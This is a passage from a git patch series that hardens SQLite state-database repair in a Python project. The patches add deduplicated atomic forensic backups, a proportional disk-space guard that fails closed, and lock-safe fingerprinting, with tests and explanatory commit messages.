_db_fingerprint(db) == before + + +def test_fingerprint_changes_when_contents_change(tmp_path): + """Genuine recovery must still reset the attempt budget.""" + db = _damaged_db(tmp_path) + before = _db_fingerprint(db) + db.write_bytes(b"SQLite format 3\x00" + os.urandom(200_000)) + assert _db_fingerprint(db) != before + + +def test_fingerprint_changes_on_truncation(tmp_path): + db = _damaged_db(tmp_path) + before = _db_fingerprint(db) + with open(db, "r+b") as fh: + fh.truncate(1024) + assert _db_fingerprint(db) != before + + +# --------------------------------------------------------------------------- +# Attempt ledger +# --------------------------------------------------------------------------- + + +def test_attempt_budget_exhausts_despite_mtime_churn(tmp_path): + """The loop must terminate even when every pass touches the file.""" + db = _damaged_db(tmp_path) + for _ in range(_MAX_PERSISTENT_REPAIR_ATTEMPTS): + assert not _persistent_repair_attempts_exhausted(db) + _record_repair_outcome(db, repaired=False) + time.sleep(0.01) + os.utime(db, None) + assert _persistent_repair_attempts_exhausted(db) + + +def test_successful_repair_clears_budget(tmp_path): + db = _damaged_db(tmp_path) + for _ in range(_MAX_PERSISTENT_REPAIR_ATTEMPTS): + _record_repair_outcome(db, repaired=False) + assert _persistent_repair_attempts_exhausted(db) + _record_repair_outcome(db, repaired=True) + assert not _persistent_repair_attempts_exhausted(db) + + +# --------------------------------------------------------------------------- +# Backup dedupe +# --------------------------------------------------------------------------- + + +def test_backup_dedupes_across_mtime_change(tmp_path): + """Repeated passes over identical bytes must not each write a new copy.""" + db = _damaged_db(tmp_path) + first, err = _backup_db_file(db) + assert err is None and first is not None + for _ in range(5): + time.sleep(0.01) + os.utime(db, None) + again, err = _backup_db_file(db) + assert err is None + assert again == first, "a touched-but-identical DB was copied again" + assert len(_existing_malformed_backups(db)) == 1 + + +def test_backup_retention_cap_still_holds(tmp_path): + """Genuinely different damaged states are kept, but bounded.""" + db = _damaged_db(tmp_path) + for _ in range(_MAX_MALFORMED_BACKUPS + 3): + db.write_bytes(b"SQLite format 3\x00" + os.urandom(200_000)) + _backup_db_file(db) + assert len(_existing_malformed_backups(db)) <= _MAX_MALFORMED_BACKUPS + + +# --------------------------------------------------------------------------- +# Free-space guard +# --------------------------------------------------------------------------- + + +def test_backup_refused_when_disk_would_be_exhausted(tmp_path): + """A nearly-full volume must not be finished off by the forensic copy.""" + db = _damaged_db(tmp_path) + tight = type( + "Usage", (), {"total": 0, "used": 0, "free": _REPAIR_BACKUP_MIN_FREE_BYTES // 2} + )() + with patch("shutil.disk_usage", return_value=tight): + path, reason = _backup_db_file(db) + assert path is None + assert reason is not None and "free" in reason.lower() + assert not _existing_malformed_backups(db) + + +def test_backup_allowed_with_ample_disk(tmp_path): + db = _damaged_db(tmp_path) + roomy = type( + "Usage", (), {"total": 0, "used": 0, "free": _REPAIR_BACKUP_MIN_FREE_BYTES * 10} + )() + with patch("shutil.disk_usage", return_value=roomy): + path, reason = _backup_db_file(db) + assert reason is None and path is not None + + +def test_repair_aborts_when_backup_refused_for_disk(tmp_path): + """Refused backup is a HARD STOP — never mutate the only damaged copy.""" + db = _damaged_db(tmp_path) + tight = type( + "Usage", (), {"total": 0, "used": 0, "free": _REPAIR_BACKUP_MIN_FREE_BYTES // 2} + )() + with patch("shutil.disk_usage", return_value=tight): + report = hermes_state.repair_state_db_schema(db) + assert not report.get("repaired") + assert "free" in (report.get("error") or "").lower() From c914a9ac4be6c0a56d39e113b323387d99cf8d8a Mon Sep 17 00:00:00 2001 From: jirathip-k <115384744+jirathip-k@users.noreply.github.com> Date: Mon, 17 Aug 2026 14:24:53 +0700 Subject: [PATCH 126/161] fix(state): make backup atomic and the disk guard proportional MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Follow-up to adversarial review of the first commit. Three findings, two confirmed by test and fixed here, one disproven and left alone. CONFIRMED — the free-space guard was a threshold, not cleanup. Prune runs only on the success path, so any copy that failed partway (ENOSPC, sidecar copy failure, kill mid-copy) left a file matching the `malformed-backup-` prefix that nothing ever removed. Measured on the unpatched tree: backups capped at 3 while copies succeed, but 13+ and climbing once copy2 raises — self-reinforcing, since each partial consumes the space that guarantees the next failure. Worse, partials sort newest-by-name, so a later successful prune KEPT the garbage and deleted the intact forensic copies. Fix: copy to a `.incomplete` staging name that does not match the backup prefix, os.replace into place only after every copy succeeds, unlink staging on failure, and sweep stale staging debris on entry. CONFIRMED — the 2GiB floor was a small-volume regression. A 50MB DB on a 10GB volume with 1.5GB free (30x headroom) was refused, and since a refused backup is a HARD STOP (#69603) that silently converts "repair loops" into "repair never runs". Fix: require the copy itself (now including its -wal/-shm sidecars, which the old check ignored) plus proportional headroom — max(256MiB, 2% of volume). DISPROVEN — the review claimed a refused backup skips _record_repair_outcome so the loop never terminates. It does not: repair_state_db_schema records the outcome on the result returned by _repair_state_db_schema_locked, which is where the hard stop returns. Verified on a simulated low-disk host: terminal at pass 4 with zero backups written. No change made. Tests: 5 new (small-volume allow, proportional headroom, sidecar accounting, failed-copy leaves no countable debris + staging swept). 23 pass with the #86747 suite; test_hermes_state.py 252 passed. Pre-existing unrelated failures unchanged. --- hermes_state.py | 102 +++++++++++++++++------ tests/test_state_db_repair_loop_mtime.py | 79 +++++++++++++++++- 2 files changed, 156 insertions(+), 25 deletions(-) diff --git a/hermes_state.py b/hermes_state.py index ca78943f9e..cad93e95c8 100644 --- a/hermes_state.py +++ b/hermes_state.py @@ -1859,12 +1859,27 @@ _MAX_MALFORMED_BACKUPS = 3 # header on any real recovery), while staying O(1) on a multi-GB file. _FINGERPRINT_SAMPLE_BYTES = 65536 -# Free-space floor for the pre-repair forensic backup. The backup is a full -# raw copy of the damaged DB, so a repair loop on a large state.db is a disk -# amplifier: the reported incident wrote 98MB every ~10s until the volume was -# nearly full, which would have taken down every agent on the host. Refuse -# the copy unless the volume would still hold this much afterwards. -_REPAIR_BACKUP_MIN_FREE_BYTES = 2 * 1024 * 1024 * 1024 # 2 GiB +# Free-space headroom for the pre-repair forensic backup. The backup is a +# full raw copy of the damaged DB (plus its -wal/-shm sidecars), so a repair +# loop on a large state.db is a disk amplifier: the reporting incident wrote +# ~98MB every ~10s until the volume was nearly full, which would have taken +# down every agent on the host. +# +# Proportional, not a flat floor: an absolute multi-GB reserve would refuse +# backups that fit comfortably on small container/VM volumes, and because a +# refused backup is a HARD STOP (#69603) that would silently convert "repair +# loops" into "repair never runs" for those deployments. Require the copy +# itself plus a small slice of the volume, clamped to a modest floor. +_REPAIR_BACKUP_MIN_FREE_BYTES = 256 * 1024 * 1024 # 256 MiB absolute floor +_REPAIR_BACKUP_FREE_FRACTION = 0.02 # plus 2% of the volume + + +def _repair_backup_headroom_bytes(total_bytes: int) -> int: + """Free space required *beyond* the copy itself, for a volume of *total_bytes*.""" + return max( + _REPAIR_BACKUP_MIN_FREE_BYTES, + int(total_bytes * _REPAIR_BACKUP_FREE_FRACTION), + ) def _repair_ledger_path(db_path: Path) -> Path: @@ -2070,31 +2085,70 @@ def _backup_db_file(db_path: Path) -> "Tuple[Optional[Path], Optional[str]]": return existing, None except OSError: pass - # Disk guard: this is a full raw copy of a possibly multi-GB DB. On a - # host whose volume is already nearly full — which a preceding repair - # loop may itself have caused — taking it can finish off the disk and - # take down every process on the machine. Refuse while there is still - # room to refuse in. + # Disk guard: this is a full raw copy of a possibly multi-GB DB plus + # its sidecars. On a host whose volume is already nearly full — which + # a preceding repair loop may itself have caused — taking it can + # finish off the disk and take down every process on the machine. + # Refuse while there is still room to refuse in. try: - src_size = db_path.stat().st_size - free = shutil.disk_usage(db_path.parent).free - if free - src_size < _REPAIR_BACKUP_MIN_FREE_BYTES: + need = db_path.stat().st_size + for suffix in ("-wal", "-shm"): + sidecar = db_path.with_name(db_path.name + suffix) + if sidecar.exists(): + need += sidecar.stat().st_size + usage = shutil.disk_usage(db_path.parent) + headroom = _repair_backup_headroom_bytes(usage.total) + if usage.free - need < headroom: reason = ( - f"only {free / 1e9:.1f}GB free on {db_path.parent}; copying " - f"the {src_size / 1e9:.1f}GB damaged DB would leave less than " - f"{_REPAIR_BACKUP_MIN_FREE_BYTES / 1e9:.1f}GB. Free disk space, " - "then retry (or recover manually with `sqlite3 " - f"{db_path} \".recover\"`)." + f"only {usage.free / 1e9:.2f}GB free on {db_path.parent}; " + f"copying the damaged DB needs {need / 1e9:.2f}GB and must " + f"leave {headroom / 1e9:.2f}GB headroom. Free disk space, " + f"then retry (or recover manually with `sqlite3 {db_path} " + '".recover"`).' ) logger.error("Refusing forensic backup of %s: %s", db_path, reason) return None, reason except OSError: pass - shutil.copy2(db_path, backup_path) - for suffix in ("-wal", "-shm"): - sidecar = db_path.with_name(db_path.name + suffix) - if sidecar.exists(): - shutil.copy2(sidecar, backup_path.with_name(backup_path.name + suffix)) + # Copy to a staging name that does NOT match the backup prefix, then + # rename into place only once every copy has succeeded. A copy that + # fails partway (ENOSPC, kill) would otherwise leave a prefix-matching + # partial that `_prune_malformed_backups` never reaches — prune runs + # only on the success path — so debris accumulated unbounded and, on a + # later successful pass, the newest-by-name partials were KEPT while + # intact forensic copies were pruned away. + staging = db_path.with_name(f"{backup_path.name}.incomplete") + staged: "List[Tuple[Path, Path]]" = [] + try: + # Clear debris from an earlier interrupted pass (kill mid-copy). + # Matches sidecar staging names (``.incomplete-wal``) too. + for old in db_path.parent.glob( + f"{db_path.name}.malformed-backup-*.incomplete*" + ): + old.unlink(missing_ok=True) + shutil.copy2(db_path, staging) + staged.append((staging, backup_path)) + for suffix in ("-wal", "-shm"): + sidecar = db_path.with_name(db_path.name + suffix) + if sidecar.exists(): + side_staging = staging.with_name(staging.name + suffix) + shutil.copy2(sidecar, side_staging) + staged.append( + (side_staging, backup_path.with_name(backup_path.name + suffix)) + ) + for src, dst in staged: + os.replace(src, dst) + except Exception: + for src, _ in staged: + try: + src.unlink(missing_ok=True) + except OSError: + pass + try: + staging.unlink(missing_ok=True) + except OSError: + pass + raise # Retention cap (#86747): keep only the newest few forensic copies. _prune_malformed_backups(db_path) return backup_path, None diff --git a/tests/test_state_db_repair_loop_mtime.py b/tests/test_state_db_repair_loop_mtime.py index 7a625d31f4..7fc4b23fa5 100644 --- a/tests/test_state_db_repair_loop_mtime.py +++ b/tests/test_state_db_repair_loop_mtime.py @@ -22,6 +22,7 @@ missing free-space refusal. from __future__ import annotations import os +import shutil import time from pathlib import Path from unittest.mock import patch @@ -36,6 +37,7 @@ from hermes_state import ( _existing_malformed_backups, _persistent_repair_attempts_exhausted, _record_repair_outcome, + _repair_backup_headroom_bytes, ) @@ -137,7 +139,9 @@ def test_backup_refused_when_disk_would_be_exhausted(tmp_path): """A nearly-full volume must not be finished off by the forensic copy.""" db = _damaged_db(tmp_path) tight = type( - "Usage", (), {"total": 0, "used": 0, "free": _REPAIR_BACKUP_MIN_FREE_BYTES // 2} + "Usage", + (), + {"total": 10_000_000_000, "used": 0, "free": _REPAIR_BACKUP_MIN_FREE_BYTES // 2}, )() with patch("shutil.disk_usage", return_value=tight): path, reason = _backup_db_file(db) @@ -146,6 +150,79 @@ def test_backup_refused_when_disk_would_be_exhausted(tmp_path): assert not _existing_malformed_backups(db) +def test_backup_allowed_on_small_volume_with_room(tmp_path): + """A flat multi-GB floor would disable repair on small VMs/containers. + + 50MB DB on a 10GB volume with 1.5GB free fits with ~30x headroom; the + guard must allow it rather than hard-stopping repair forever. + """ + db = _damaged_db(tmp_path, size=50_000_000) + small_vm = type( + "Usage", (), {"total": 10_000_000_000, "used": 8_500_000_000, "free": 1_500_000_000} + )() + with patch("shutil.disk_usage", return_value=small_vm): + path, reason = _backup_db_file(db) + assert reason is None and path is not None + + +def test_headroom_scales_with_volume_size(): + """Big volumes reserve proportionally; small ones keep a modest floor.""" + assert _repair_backup_headroom_bytes(1_000_000_000) == _REPAIR_BACKUP_MIN_FREE_BYTES + assert _repair_backup_headroom_bytes(1_000_000_000_000) > _REPAIR_BACKUP_MIN_FREE_BYTES + + +def test_disk_guard_accounts_for_sidecars(tmp_path): + """The copy includes -wal/-shm, so the space check must count them.""" + db = _damaged_db(tmp_path, size=1_000_000) + db.with_name(db.name + "-wal").write_bytes(os.urandom(400_000_000)) + usage = type( + "Usage", + (), + {"total": 10_000_000_000, "used": 0, "free": _REPAIR_BACKUP_MIN_FREE_BYTES + 300_000_000}, + )() + with patch("shutil.disk_usage", return_value=usage): + path, reason = _backup_db_file(db) + assert path is None, "sidecar bytes were ignored by the free-space check" + assert reason is not None + + +def test_failed_copy_leaves_no_countable_debris(tmp_path): + """Prune only runs on success, so a failed copy must self-clean. + + Otherwise partials matching the backup prefix accumulate unbounded and, + on a later successful pass, are KEPT (newest by name) while intact + forensic copies get pruned away. + """ + db = _damaged_db(tmp_path, size=1_000_000) + db.with_name(db.name + "-wal").write_bytes(os.urandom(1_000_000)) + roomy = type( + "Usage", (), {"total": 500_000_000_000, "used": 0, "free": 400_000_000_000} + )() + real_copy2 = shutil.copy2 + + def sidecar_fails(src, dst, *a, **kw): + if str(src).endswith("-wal"): + Path(dst).write_bytes(b"PARTIAL" * 100) + raise OSError(28, "No space left on device") + return real_copy2(src, dst, *a, **kw) + + with patch("shutil.disk_usage", return_value=roomy), \ + patch("shutil.copy2", sidecar_fails): + for _ in range(6): + _backup_db_file(db) + time.sleep(0.01) + os.utime(db, None) + + assert len(_existing_malformed_backups(db)) <= _MAX_MALFORMED_BACKUPS + + # a later successful pass must sweep any staging debris + with patch("shutil.disk_usage", return_value=roomy): + path, reason = _backup_db_file(db) + assert reason is None and path is not None + strays = list(tmp_path.glob("*.incomplete*")) + assert not strays, f"staging debris survived: {strays}" + + def test_backup_allowed_with_ample_disk(tmp_path): db = _damaged_db(tmp_path) roomy = type( From b3f14c8534424b4d9e59f6a4f35b0bc394aa0cc2 Mon Sep 17 00:00:00 2001 From: kshitij <82637225+kshitijk4poor@users.noreply.github.com> Date: Mon, 17 Aug 2026 18:31:51 +0530 Subject: [PATCH 127/161] fix(state): keep the repair fingerprint from cancelling POSIX advisory locks The content fingerprint takes a raw descriptor, and close() on ANY descriptor cancels every POSIX advisory lock the process holds on that file. The exhaustion probe runs before _backup_db_file's has_live_connection guard, so the read happened even when a peer SessionDB held a write lock. Verified end-to-end (journal_mode=DELETE, gateway mid-turn write, peer in a subprocess): before peer BLOCKED -> repair -> peer BLOCKED, holder COMMIT ok unfixed peer BLOCKED -> repair -> peer STOLE the lock, holder COMMIT: disk I/O error WAL is immune (it coordinates through -shm), but DELETE is what Hermes falls back to on NFS/SMB/FUSE/ZFS and on SQLite builds vulnerable to the WAL-reset bug, so this is a real deployment shape. Run the read under offline_file_access and fall back to size:mtime_ns when a connection is live. That keeps the ledger counting instead of returning None (which reads as "not exhausted" and would restore the unbounded loop), and the content key stays load-bearing on the offline repair path -- the only path where surgery actually runs. Also fail the free-space guard CLOSED: a nearly-full volume is exactly where statvfs is likeliest to fail, and proceeding is the multi-GB copy that finishes off the disk. --- hermes_state.py | 65 ++++++++++-- tests/test_state_db_repair_loop_mtime.py | 127 +++++++++++++++++++++++ 2 files changed, 181 insertions(+), 11 deletions(-) diff --git a/hermes_state.py b/hermes_state.py index cad93e95c8..cfe94c9807 100644 --- a/hermes_state.py +++ b/hermes_state.py @@ -1845,8 +1845,8 @@ def _bump_schema_cookie(conn: sqlite3.Connection) -> None: # # * a sidecar attempt ledger (``.repair-attempts.json``) that refuses # further surgery after ``_MAX_PERSISTENT_REPAIR_ATTEMPTS`` failures on -# the SAME damaged file (fingerprint = size + mtime; any successful repair -# or replacement changes it and resets the count); +# the SAME damaged file (fingerprint = size + a bounded content sample; any +# successful repair or replacement changes it and resets the count); # * backup dedupe + a retention cap in ``_backup_db_file`` — an identical # damaged file is never copied twice, and only the newest # ``_MAX_MALFORMED_BACKUPS`` forensic copies are kept. @@ -1906,16 +1906,47 @@ def _db_fingerprint(db_path: Path) -> "Optional[str]": size plus the head/tail slices that any real repair, truncation or restore necessarily changes. Stable across passes that merely touch mtime; still resets the attempt count after genuine recovery. + + The content read runs under ``offline_file_access`` because it takes a raw + descriptor, and ``close()`` on ANY descriptor cancels every POSIX advisory + lock this process holds on the file — including a peer connection's + RESERVED lock (see ``hermes_cli.sqlite_safe_read`` rule 1). This function + is reached from ``repair_state_db_schema``'s exhaustion probe BEFORE + ``_backup_db_file``'s ``has_live_connection`` guard, and the repair path is + entered by one SessionDB while the gateway holds others, so a live peer is + the expected case rather than a theoretical one. When one exists we fall + back to ``size:mtime_ns``: a live connection means the backup is refused + and repair HARD STOPs (#69603), so no surgery runs and nothing moves mtime + behind our back — the content key is only load-bearing on the offline + repair path, which is exactly where the guard lets it through. """ try: st = db_path.stat() - with open(db_path, "rb") as fh: - head = fh.read(_FINGERPRINT_SAMPLE_BYTES) - if st.st_size > _FINGERPRINT_SAMPLE_BYTES: - fh.seek(max(0, st.st_size - _FINGERPRINT_SAMPLE_BYTES)) - tail = fh.read(_FINGERPRINT_SAMPLE_BYTES) - else: - tail = b"" + try: + from hermes_cli.sqlite_safe_read import ( + LiveConnectionError, + offline_file_access, + ) + except ImportError: + # Scaffold/embed installs ship hermes_state without hermes_cli. No + # tracked connections exist there, so the raw read is safe. + LiveConnectionError = () # type: ignore[assignment] + offline_file_access = None # type: ignore[assignment] + try: + with ( + contextlib.nullcontext() + if offline_file_access is None + else offline_file_access(db_path, what="fingerprint") + ): + with open(db_path, "rb") as fh: + head = fh.read(_FINGERPRINT_SAMPLE_BYTES) + if st.st_size > _FINGERPRINT_SAMPLE_BYTES: + fh.seek(max(0, st.st_size - _FINGERPRINT_SAMPLE_BYTES)) + tail = fh.read(_FINGERPRINT_SAMPLE_BYTES) + else: + tail = b"" + except LiveConnectionError: + return f"{st.st_size}:{st.st_mtime_ns}" digest = hashlib.sha256(head + tail).hexdigest()[:32] return f"{st.st_size}:{digest}" except OSError: @@ -2108,8 +2139,20 @@ def _backup_db_file(db_path: Path) -> "Tuple[Optional[Path], Optional[str]]": ) logger.error("Refusing forensic backup of %s: %s", db_path, reason) return None, reason - except OSError: - pass + except OSError as exc: + # Fail CLOSED. This guard exists for the nearly-full volume, which + # is exactly where stat()/disk_usage() is most likely to fail — and + # proceeding would take the multi-GB copy that finishes off the + # disk. A refused backup is a HARD STOP (#69603), so repair simply + # does not run until a human frees space, which is the safe side. + reason = ( + f"could not determine free space on {db_path.parent} ({exc}); " + "refusing the forensic copy rather than risk filling the " + f"volume. Free disk space, then retry (or recover manually " + f'with `sqlite3 {db_path} ".recover"`).' + ) + logger.error("Refusing forensic backup of %s: %s", db_path, reason) + return None, reason # Copy to a staging name that does NOT match the backup prefix, then # rename into place only once every copy has succeeded. A copy that # fails partway (ENOSPC, kill) would otherwise leave a prefix-matching diff --git a/tests/test_state_db_repair_loop_mtime.py b/tests/test_state_db_repair_loop_mtime.py index 7fc4b23fa5..b0fc6b8701 100644 --- a/tests/test_state_db_repair_loop_mtime.py +++ b/tests/test_state_db_repair_loop_mtime.py @@ -23,6 +23,7 @@ from __future__ import annotations import os import shutil +import sqlite3 import time from pathlib import Path from unittest.mock import patch @@ -243,3 +244,129 @@ def test_repair_aborts_when_backup_refused_for_disk(tmp_path): report = hermes_state.repair_state_db_schema(db) assert not report.get("repaired") assert "free" in (report.get("error") or "").lower() + + +# --------------------------------------------------------------------------- +# Lock safety: the content fingerprint must not cancel POSIX advisory locks +# --------------------------------------------------------------------------- + + +def test_fingerprint_takes_no_raw_fd_while_a_connection_is_live(tmp_path): + """The content read must not ``open()`` a DB that has a live connection. + + ``close()`` on ANY descriptor cancels every POSIX advisory lock this + process holds on the file (https://sqlite.org/howtocorrupt.html), so a + peer connection's RESERVED lock is silently dropped and another process + can write into a file the holder still believes it owns. The exhaustion + probe runs BEFORE ``_backup_db_file``'s ``has_live_connection`` guard, so + the fingerprint has to guard itself. + """ + import builtins + + from hermes_cli.sqlite_safe_read import connect_tracked + + db = tmp_path / "state.db" + conn = sqlite3.connect(str(db)) + conn.execute("CREATE TABLE t(a)") + conn.commit() + conn.close() + + live = connect_tracked(db, isolation_level=None, check_same_thread=False) + try: + opened: list[str] = [] + real_open = builtins.open + + def spy(target, *a, **kw): + if str(target).endswith("state.db"): + opened.append(str(target)) + return real_open(target, *a, **kw) + + with patch.object(builtins, "open", spy): + fp = _db_fingerprint(db) + + assert not opened, f"raw fd taken on a live DB: {opened}" + # Must still return an identity, or the attempt ledger silently stops + # counting (fp None => "not exhausted" => the loop never terminates). + assert fp is not None + finally: + live.close() + + +def test_live_connection_keeps_its_write_lock_across_a_repair_pass(tmp_path): + """End-to-end: a peer must not be able to steal the holder's write lock. + + The peer runs in a SUBPROCESS on purpose. POSIX advisory locks are owned + per-process, so a same-process peer shares the holder's lock ownership and + cannot demonstrate the cancellation — it stays blocked either way, which + makes the test vacuous. + + Rollback-journal mode only — WAL coordinates through ``-shm`` rather than + POSIX advisory locks, so it is immune. DELETE mode is what Hermes falls + back to on NFS/SMB/FUSE/ZFS and on SQLite builds vulnerable to the + WAL-reset bug, so it is a real deployment shape, not a corner case. + """ + import subprocess + import sys + import textwrap + + from hermes_cli.sqlite_safe_read import connect_tracked + + db = tmp_path / "state.db" + conn = sqlite3.connect(str(db)) + conn.execute("PRAGMA journal_mode=DELETE") + conn.execute("CREATE TABLE sessions(id TEXT)") + conn.commit() + conn.close() + + peer_script = tmp_path / "peer.py" + peer_script.write_text( + textwrap.dedent( + """ + import sqlite3, sys + con = sqlite3.connect(sys.argv[1], timeout=0.3, isolation_level=None) + try: + con.execute("BEGIN IMMEDIATE") + con.execute("INSERT INTO sessions VALUES('peer')") + con.execute("COMMIT") + print("WROTE") + except sqlite3.OperationalError: + print("BLOCKED") + """ + ) + ) + + def _peer_can_write() -> bool: + out = subprocess.run( + [sys.executable, str(peer_script), str(db)], + capture_output=True, + text=True, + timeout=60, + ).stdout.strip() + assert out in {"WROTE", "BLOCKED"}, f"unexpected peer output: {out!r}" + return out == "WROTE" + + live = connect_tracked(db, isolation_level=None, check_same_thread=False) + try: + live.execute("BEGIN IMMEDIATE") + live.execute("INSERT INTO sessions VALUES('holder')") + assert not _peer_can_write(), "peer wrote before the fingerprint (bad fixture)" + + _db_fingerprint(db) + + assert not _peer_can_write(), ( + "the fingerprint cancelled the holder's POSIX advisory lock" + ) + live.execute("COMMIT") + finally: + live.close() + + +def test_backup_refused_when_free_space_cannot_be_determined(tmp_path): + """Fail CLOSED: a nearly-full volume is where disk_usage is likeliest to + fail, and proceeding is the multi-GB copy that finishes off the disk.""" + db = _damaged_db(tmp_path) + with patch("shutil.disk_usage", side_effect=OSError("statvfs failed")): + path, reason = _backup_db_file(db) + assert path is None + assert reason is not None and "free space" in reason.lower() + assert not _existing_malformed_backups(db) From 8de64b1634231ded91e8de67b514ee48e30b9d68 Mon Sep 17 00:00:00 2001 From: kshitij <82637225+kshitijk4poor@users.noreply.github.com> Date: Mon, 17 Aug 2026 18:32:28 +0530 Subject: [PATCH 128/161] fix(state): stop backup staging from posing as a forensic copy The staging name was derived from the backup name (`.malformed-backup-.incomplete`), which still matches the prefix `_existing_malformed_backups` selects on -- it excludes only `-wal`/`-shm`. Three consequences, all reproduced: - it is COUNTED as a forensic backup; - it sorts NEWEST (`.incomplete` > the bare stamp), so prune's keep-3-newest slice retained partials and deleted intact copies -- the exact inversion the staging change was meant to prevent; - worst, the dedupe ran BEFORE the sweep, and a staging file orphaned by a kill mid-copy is a byte-identical copy of the damaged DB, so its fingerprint MATCHES and it was handed back as the official `backup_path`. Repair then passed the #69603 hard-stop gate and ran destructive surgery believing a forensic copy existed, and the next pass's sweep deleted that very file. Move staging outside the prefix (`.backup-staging-`) and sweep before the dedupe. The sweep also matches the pre-merge `.incomplete` spelling so a host that ran the earlier build does not keep prefix-matching debris that sorts newest and survives prune forever. Before / after on the same fixture (orphaned staging + a later pass): before backup_path = ...malformed-backup-.incomplete (staging!) pass-1 forensic copy deleted by the next sweep after backup_path = ...malformed-backup- (real copy) debris swept, pass-1 forensic copy preserved --- hermes_state.py | 42 ++++++++---- tests/test_state_db_repair_loop_mtime.py | 87 +++++++++++++++++++++++- 2 files changed, 114 insertions(+), 15 deletions(-) diff --git a/hermes_state.py b/hermes_state.py index cfe94c9807..eb1dddf2c6 100644 --- a/hermes_state.py +++ b/hermes_state.py @@ -2094,6 +2094,23 @@ def _backup_db_file(db_path: Path) -> "Tuple[Optional[Path], Optional[str]]": ) seq += 1 try: + # Sweep staging debris from an earlier interrupted pass (kill mid-copy) + # BEFORE the dedupe below. A leftover staging file is a byte-identical + # copy of the damaged DB, so its fingerprint MATCHES and the dedupe + # would otherwise hand it back as a legitimate forensic backup. + # Matches sidecar staging names (``.backup-staging--wal``) too. + # The second pattern is the pre-merge ``.incomplete`` spelling, swept so + # a host that ran that build does not keep prefix-matching debris that + # sorts NEWEST and survives prune forever. + for pattern in ( + f"{db_path.name}.backup-staging-*", + f"{db_path.name}.malformed-backup-*.incomplete*", + ): + for old in db_path.parent.glob(pattern): + try: + old.unlink(missing_ok=True) + except OSError: # pragma: no cover - best effort + pass # Dedupe (#86747): a repair loop used to copy the SAME damaged bytes # on every restart — ~900MB a pass, 89GB over 11 days in the # reporting install. If the newest existing backup already matches @@ -2153,22 +2170,19 @@ def _backup_db_file(db_path: Path) -> "Tuple[Optional[Path], Optional[str]]": ) logger.error("Refusing forensic backup of %s: %s", db_path, reason) return None, reason - # Copy to a staging name that does NOT match the backup prefix, then - # rename into place only once every copy has succeeded. A copy that - # fails partway (ENOSPC, kill) would otherwise leave a prefix-matching - # partial that `_prune_malformed_backups` never reaches — prune runs - # only on the success path — so debris accumulated unbounded and, on a - # later successful pass, the newest-by-name partials were KEPT while - # intact forensic copies were pruned away. - staging = db_path.with_name(f"{backup_path.name}.incomplete") + # Copy to a staging name OUTSIDE the ``.malformed-backup-`` prefix, then + # rename into place only once every copy has succeeded. The prefix + # matters: ``_existing_malformed_backups`` matches on + # ``startswith(f"{db}.malformed-backup-")`` and excludes only ``-wal``/ + # ``-shm`` suffixes, so a staging name derived from the backup name (e.g. + # ``…malformed-backup-.incomplete``) still counts as a backup — + # it sorts NEWEST (``.incomplete`` > the bare stamp), so prune's + # keep-3-newest slice retained partials and deleted intact copies, and + # the dedupe could hand a partial back as the official ``backup_path``, + # passing the #69603 hard-stop gate with no real forensic copy on disk. + staging = db_path.with_name(f"{db_path.name}.backup-staging-{stamp}") staged: "List[Tuple[Path, Path]]" = [] try: - # Clear debris from an earlier interrupted pass (kill mid-copy). - # Matches sidecar staging names (``.incomplete-wal``) too. - for old in db_path.parent.glob( - f"{db_path.name}.malformed-backup-*.incomplete*" - ): - old.unlink(missing_ok=True) shutil.copy2(db_path, staging) staged.append((staging, backup_path)) for suffix in ("-wal", "-shm"): diff --git a/tests/test_state_db_repair_loop_mtime.py b/tests/test_state_db_repair_loop_mtime.py index b0fc6b8701..3d1276f0d1 100644 --- a/tests/test_state_db_repair_loop_mtime.py +++ b/tests/test_state_db_repair_loop_mtime.py @@ -220,7 +220,9 @@ def test_failed_copy_leaves_no_countable_debris(tmp_path): with patch("shutil.disk_usage", return_value=roomy): path, reason = _backup_db_file(db) assert reason is None and path is not None - strays = list(tmp_path.glob("*.incomplete*")) + strays = list(tmp_path.glob("*.backup-staging-*")) + list( + tmp_path.glob("*.incomplete*") + ) assert not strays, f"staging debris survived: {strays}" @@ -361,6 +363,89 @@ def test_live_connection_keeps_its_write_lock_across_a_repair_pass(tmp_path): live.close() +# --------------------------------------------------------------------------- +# Staging must never be mistaken for a forensic backup +# --------------------------------------------------------------------------- + + +def test_staging_name_is_outside_the_backup_prefix(tmp_path): + """Whatever staging name the code picks must not be counted as a backup. + + Observes the REAL staging path (captured from the copy call) rather than + hardcoding it, so the assertion binds to the invariant instead of to + today's spelling. ``_existing_malformed_backups`` matches + ``startswith(f"{db}.malformed-backup-")`` and excludes only ``-wal``/ + ``-shm``, so a staging name derived from the backup name sorts NEWEST and + prune keeps partials while deleting intact copies. + """ + db = _damaged_db(tmp_path, size=20_000) + roomy = type( + "Usage", (), {"total": 500_000_000_000, "used": 0, "free": 400_000_000_000} + )() + real_copy2 = shutil.copy2 + staging_names: list[str] = [] + + def capture(src, dst, *a, **kw): + staging_names.append(Path(dst).name) + return real_copy2(src, dst, *a, **kw) + + with patch("shutil.disk_usage", return_value=roomy), \ + patch("shutil.copy2", capture): + path, reason = _backup_db_file(db) + + assert reason is None and path is not None + assert staging_names, "no copy was made (fixture problem)" + prefix = f"{db.name}.malformed-backup-" + for name in staging_names: + assert not name.startswith(prefix), ( + f"staging name {name!r} matches the backup prefix — it would be " + "counted by _existing_malformed_backups, sort NEWEST, and let " + "prune keep partials while deleting intact forensic copies" + ) + + +def test_orphaned_staging_is_never_returned_as_the_backup_path(tmp_path): + """A kill mid-copy leaves a byte-identical staging file; the dedupe must + not hand it back as the official ``backup_path``. + + It would pass the #69603 hard-stop gate — repair then runs destructive + surgery believing a forensic copy exists — and the next pass's sweep + deletes that very file. + """ + db = _damaged_db(tmp_path, size=20_000) + roomy = type( + "Usage", (), {"total": 500_000_000_000, "used": 0, "free": 400_000_000_000} + )() + + # Discover the staging name the implementation actually uses, then plant an + # orphan under it — so this binds to the code's scheme, not to a literal. + real_copy2 = shutil.copy2 + seen: list[Path] = [] + + def capture(src, dst, *a, **kw): + seen.append(Path(dst)) + return real_copy2(src, dst, *a, **kw) + + with patch("shutil.disk_usage", return_value=roomy), \ + patch("shutil.copy2", capture): + first, _ = _backup_db_file(db) + assert first is not None + Path(first).unlink(missing_ok=True) + orphan = seen[0] + shutil.copy2(db, orphan) # identical bytes => fingerprint matches + assert orphan.exists() + + with patch("shutil.disk_usage", return_value=roomy): + path, reason = _backup_db_file(db) + + assert reason is None and path is not None + assert Path(path) != orphan, f"staging returned as 